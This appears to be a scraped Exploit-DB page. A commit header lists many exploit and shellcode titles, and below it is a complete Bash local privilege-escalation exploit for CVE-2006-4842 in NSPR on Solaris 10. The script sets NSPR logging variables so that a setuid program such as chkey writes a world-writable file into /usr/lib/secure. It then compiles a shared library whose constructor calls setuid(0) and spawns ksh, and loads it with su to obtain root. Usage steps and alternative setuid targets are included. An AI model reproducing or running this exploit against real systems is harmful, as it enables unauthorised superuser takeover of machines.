880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
91 lines
No EOL
3.1 KiB
Bash
Executable file
91 lines
No EOL
3.1 KiB
Bash
Executable file
source: https://www.securityfocus.com/bid/20471/info
|
|
|
|
The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.
|
|
|
|
A successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer.
|
|
|
|
Version 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.
|
|
|
|
#!/bin/sh
|
|
|
|
#
|
|
# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $
|
|
#
|
|
# raptor_libnspr3 - Solaris 10 libnspr constructor exploit
|
|
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
|
|
#
|
|
# Local exploitation of a design error vulnerability in version 4.6.1 of
|
|
# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to
|
|
# create or overwrite arbitrary files on the system. The problem exists
|
|
# because environment variables are used to create log files. Even when the
|
|
# program is setuid, users can specify a log file that will be created with
|
|
# elevated privileges (CVE-2006-4842).
|
|
#
|
|
# Yet another newschool version of the local root exploit: this time we place
|
|
# our code in the global constructor (ctors) for the library, as suggested by
|
|
# gera. This way, we don't have to hide a real function and we have a generic
|
|
# library that can be used in all exploits like this. To avoid annoying side-
|
|
# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing
|
|
# a library in the default search path.
|
|
#
|
|
# See also:
|
|
# http://www.0xdeadbeef.info/exploits/raptor_libnspr
|
|
# http://www.0xdeadbeef.info/exploits/raptor_libnspr2
|
|
#
|
|
# Usage:
|
|
# $ chmod +x raptor_libnspr3
|
|
# $ ./raptor_libnspr3
|
|
# [...]
|
|
# Sun Microsystems Inc. SunOS 5.10 Generic January 2005
|
|
# # id
|
|
# uid=0(root) gid=1(other)
|
|
# # rm /usr/lib/secure/libldap.so.5
|
|
# #
|
|
#
|
|
# Vulnerable platforms (SPARC):
|
|
# Solaris 10 without patch 119213-10 [tested]
|
|
#
|
|
# Vulnerable platforms (x86):
|
|
# Solaris 10 without patch 119214-10 [untested]
|
|
#
|
|
|
|
echo "raptor_libnspr3 - Solaris 10 libnspr constructor exploit"
|
|
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
|
|
echo
|
|
|
|
# prepare the environment
|
|
NSPR_LOG_MODULES=all:5
|
|
NSPR_LOG_FILE=/usr/lib/secure/libldap.so.5
|
|
export NSPR_LOG_MODULES NSPR_LOG_FILE
|
|
|
|
# gimme -rw-rw-rw-!
|
|
umask 0
|
|
|
|
# setuid program linked to /usr/lib/mps/libnspr4.so
|
|
/usr/bin/chkey
|
|
|
|
# other good setuid targets
|
|
#/usr/bin/passwd
|
|
#/usr/bin/lp
|
|
#/usr/bin/cancel
|
|
#/usr/bin/lpset
|
|
#/usr/bin/lpstat
|
|
#/usr/lib/lp/bin/netpr
|
|
#/usr/sbin/lpmove
|
|
#/usr/bin/su
|
|
#/usr/bin/mailq
|
|
|
|
# prepare the evil shared library
|
|
echo "void __attribute__ ((constructor)) cons() {" > /tmp/ctors.c
|
|
echo " setuid(0);" >> /tmp/ctors.c
|
|
echo " execle(\"/bin/ksh\", \"ksh\", 0, 0);" >> /tmp/ctors.c
|
|
echo "}" >> /tmp/ctors.c
|
|
gcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc
|
|
if [ $? -ne 0 ]; then
|
|
echo "problems compiling evil shared library, check your gcc"
|
|
exit 1
|
|
fi
|
|
|
|
# newschool LD_LIBRARY_PATH foo;)
|
|
unset NSPR_LOG_MODULES NSPR_LOG_FILE
|
|
LD_LIBRARY_PATH=/usr/lib/secure su - |